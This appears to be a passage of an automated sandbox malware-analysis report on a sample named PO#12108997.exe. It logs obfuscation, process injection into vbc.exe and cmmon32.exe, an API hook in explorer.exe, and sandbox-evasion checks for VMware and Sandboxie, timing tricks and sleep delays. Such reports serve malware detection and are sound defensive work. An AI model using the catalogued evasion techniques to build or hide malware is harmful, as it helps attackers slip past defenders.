          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: vbc.pdb source: cmmon32.exe, 00000011.00000002.502692331.0000000004705000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: PO#12108997.exe, rI/hS.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.0.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.2.PO#12108997.exe.fb0000.0.unpack, rI/hS.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_092D3E12 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00417095 push cs; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00416B77 push ss; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041D4C5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00417CD7 pushfd ; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041D57C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041D512 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041D51B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AAD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007D7095 push cs; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DD9BC push ds; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007D7CD7 pushfd ; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DD4C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DD57C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DD51B push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DD512 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.74619611944

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara matchFile source: 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PO#12108997.exe PID: 6956, type: MEMORYSTR
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000007C9904 second address: 00000000007C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000007C9B7E second address: 00000000007C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO#12108997.exe TID: 6960Thread sleep time: -45733s >= -30000s
          Source: C:\Users\user\Desktop\PO#12108997.exe TID: 6984Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 612Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\PO#12108997.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 7.6 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 8.6 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeThread delayed: delay time: 45733
          Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
          Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.340315869.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000005.00000000.308634959.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.279805713.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.294463797.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05597D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05623D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05628DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05574F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05574F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05588794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov eax, dword ptr fs:[00000030h]
